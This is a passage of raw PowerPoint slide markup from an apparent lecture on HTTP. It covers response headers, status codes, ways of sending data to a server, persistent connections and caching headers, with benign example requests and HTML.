            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2374710" y="6014113"/>
              <a:ext cx="181971" cy="461835"/>
            </a:xfrm>
            <a:prstGeom prst="leftBrac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peech Bubble: Rectangle 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F99AB413-7552-4220-A688-678455B6EB48}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="291152" y="5814179"/>
              <a:ext cx="1628633" cy="900752"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 60173"/>
                <a:gd name="adj2" fmla="val -113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Only for HTTP proxies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742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C9DFDAF-5BEB-4900-B5EE-67E5B085BB81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3493828" y="2083558"/>
            <a:ext cx="0" cy="4640239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ACD054E-657B-4998-AA03-CB9AAF7E2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Response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24184-0038-4394-B534-60E0F5CE0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2191" y="2429301"/>
            <a:ext cx="8397922" cy="4239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HTTP/1.1 200 OK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Content-Type: text/html; charset=UTF-8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Cache-Control: no-cache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Content-Encoding: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>gzip</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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Content-Length 24824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Server: Apache 2.4.2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Date: Mon, 12 Feb 2018 22:44:23 GMT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Connection: keep-alive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0"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[response content goes down here]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364D5B5-7563-4F9D-8D72-C13A561D6D8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2383809"/>
            <a:ext cx="3484729" cy="3457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056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7584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112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2640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000" dirty="0"/>
              <a:t>Version and status code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6F52C95-E8AC-4188-A9CC-A38FCE89AE6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="2736376"/>
            <a:ext cx="3484729" cy="3457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056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7584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112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2640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000" dirty="0"/>
              <a:t>File type of response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C37AEE1-94CB-49E5-B569-6E95DA5FA7AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2" y="3088943"/>
            <a:ext cx="3484729" cy="3457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056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7584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112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2640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000" dirty="0"/>
              <a:t>Cache the response?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0DEBC3B-0494-444E-A0BC-06344BEE90F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-3" y="3441510"/>
            <a:ext cx="3484729" cy="3457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056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7584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112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2640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000" dirty="0"/>
              <a:t>Response is compress?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E4FF9BF-4EEE-4F91-BD56-10DB70285F27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-4" y="3794077"/>
            <a:ext cx="3484729" cy="3457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056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7584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112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2640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000" dirty="0"/>
              <a:t>Length of response content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5812494-9C39-4B23-AD77-382C00E2875E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5" y="4146644"/>
            <a:ext cx="3484729" cy="3457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056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7584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112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2640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000" dirty="0"/>
              <a:t>Info about the web server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CAF1458-FABD-4CAF-904E-A0FCEEF5B727}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4499211"/>
            <a:ext cx="3484729" cy="3457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056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7584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112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2640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950D18C-371A-4560-82E6-12E97E20B469}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-6" y="4851779"/>
            <a:ext cx="3484729" cy="3457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056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7584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112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2640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000" dirty="0"/>
              <a:t>Close the connection?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CE0F1D-100E-49E2-96C1-824866552179}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="145576" y="2329218"/>
            <a:ext cx="6496334" cy="435094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AB14AC-FD10-4EFC-A6AF-CB83B213F857}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="145575" y="2673504"/>
            <a:ext cx="8179557" cy="435094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013513-1862-4720-8E43-57001A900DA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="145576" y="2980257"/>
            <a:ext cx="6496334" cy="435094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A0D402-6E2B-418F-B8FD-6148B88465BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="145576" y="3366697"/>
            <a:ext cx="6496334" cy="435094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D32AC3-104D-4952-ABBA-D821B9D30FD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="145576" y="3691967"/>
            <a:ext cx="6496334" cy="435094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381139-CC8D-435D-89CD-7BCC009F026C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="141027" y="4037071"/>
            <a:ext cx="7638197" cy="435094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8A1BFC4-7496-4DA3-93D2-A7C9910BE324}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3666699" y="4396462"/>
            <a:ext cx="4117074" cy="435094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8A5AE7-C233-44C3-BA3C-AA0BEABA0F9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="141027" y="4755604"/>
            <a:ext cx="7638197" cy="435094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DEC21E8-D380-43BA-A928-C1E4909C69E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3666699" y="5494857"/>
            <a:ext cx="4658435" cy="1228940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325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Response Status Codes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3 digit response code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1XX – informational</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2XX – success</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>200 OK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>3XX – redirection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>301 Moved Permanently</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>303 Moved Temporarily</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>304 Not Modified</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>4XX – client error</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>404 Not Found</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>5XX – server error</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>505 HTTP Version Not Supported</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="250569067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431"/>
            <a:ext cx="10515600" cy="934286"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sending Data Over HTTP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04123"/>
            <a:ext cx="10515600" cy="20605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Four ways to send data to the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="769728" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Embedded in the URL (typically URL encoded, but not always)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="769728" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In cookies (cookie encoded)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="769728" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Inside a custom HTTP request header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="769728" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In the HTTP request body (form-encoded)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57727" y="3777916"/>
            <a:ext cx="10940716" cy="2959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056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7584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112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2640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POST /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>purchase.html?user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>cbw&amp;item</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>iPad&amp;price</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>=399.99#shopping_cart HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>… other headers…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Cookie: user=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>cbw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>; item=iPad; price=399.99;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>X-My-Header: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>cbw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>/iPad/399.99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user=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>cbw&amp;item</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>iPad&amp;price</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>=399.99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7704440" y="4391527"/>
            <a:ext cx="489065" cy="357390"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -60833"/>
              <a:gd name="adj2" fmla="val -1165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6413051" y="4748917"/>
            <a:ext cx="489065" cy="357390"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -87894"/>
              <a:gd name="adj2" fmla="val -87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4989314" y="5149513"/>
            <a:ext cx="489065" cy="357390"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -87894"/>
              <a:gd name="adj2" fmla="val -87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5478379" y="6110259"/>
            <a:ext cx="489065" cy="357390"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -87894"/>
              <a:gd name="adj2" fmla="val -87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7065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Pages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719" y="1825625"/>
            <a:ext cx="5220477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Multiple (typically small) objects per page </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>E.g., each image, JS, CSS, etc. downloaded separately</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Single page can have 100s of HTTP transactions!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>File sizes are heavy-tailed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most transfers/objects very small</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Problem: Browser can’t render complete page until all objects are downloaded</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Shape 357"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5816082" y="1519881"/>
            <a:ext cx="6127102" cy="4657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056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7584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112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2640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1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C79C24"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&lt;!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C79C24"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>doctype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C79C24"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> html&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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endParaRPr lang="en-US" sz="18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&lt;html&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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&lt;head&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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&lt;title&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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Hello World</a:t>
            </a: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&lt;/title&gt;</a:t>
            </a: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    &lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4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lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>“../jquery.js”</a:t>
            </a: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&gt;&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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&lt;/head&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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&lt;body&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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</a:t>
            </a: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&lt;h1&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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Hello World</a:t>
            </a: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&lt;/h1&gt;</a:t>
            </a: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		  &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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img</a:t>
            </a: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1800" dirty="0" err="1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src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="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lang="en-US" sz="18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“/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1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img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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/my_face.jpg"</a:t>
            </a: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&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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img</a:t>
            </a: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&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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</a:t>
            </a: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&lt;p&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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I am 12 and what is</a:t>
            </a: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</a:t>
            </a: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&lt;a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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1800" dirty="0" err="1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href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="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lang="en-US" sz="18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"wierd_thing.html"</a:t>
            </a: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&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>this</a:t>
            </a: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&lt;/a&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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?</a:t>
            </a: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</a:t>
            </a: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&lt;/p&gt;</a:t>
            </a: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        &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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img</a:t>
            </a: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1800" dirty="0" err="1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src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="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lang="en-US" sz="18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“http://www.images.com/cat.jpg"</a:t>
            </a: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&gt;&lt;/img&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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&lt;/body&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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&lt;/html&gt;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9210092" y="365125"/>
            <a:ext cx="2438400" cy="1735494"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -51700"/>
              <a:gd name="adj2" fmla="val 721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 total objects:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>1 HTML,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>1 JavaScript,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>2 images</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19797113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0.9/1.0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request/response per TCP connection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Simple to implement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bad interactions with TCP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Requires a new three-way handshake for each object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Two extra round trip for each object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>High amounts of SYN/ACK overhead</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Download of each object begins in slow start</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Additionally, loss recovery is poor when windows are small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168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1.1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Multiplex multiple transfers onto one TCP connection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Client keeps connection open</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can send another request after the first completes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Must announce intention via a header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Connection: keep-alive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server must say how long response is, so client knows when done</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Content-Length: XXX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09199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Caching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Clients (and HTTP proxies) often cache documents</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Challenge: update of documents</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>If-Modified-Since</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> requests to check</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP 0.9/1.0 used just date</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP 1.1 has an opaque “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” (could hash of the document, etc.) as well</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Why is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>If-Modified-Since </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>not always sufficient?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dynamic content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>e.g. no two copies of the Facebook “homepage” are the same</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When/how often should the original be checked for changes?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Expires</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If no </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Expires</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, often use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Last-Modified</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> as estimate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55080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Cache Check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85666" y="1343458"/>
            <a:ext cx="5611909" cy="823912"/>
          </a:xfr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Request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85666" y="2178626"/>
            <a:ext cx="5611910" cy="457402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600" dirty="0"/>
              <a:t>GET / HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>Accept: */*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>Accept-Language: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>en</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>-us</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>Accept-Encoding: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>gzip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>, deflate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
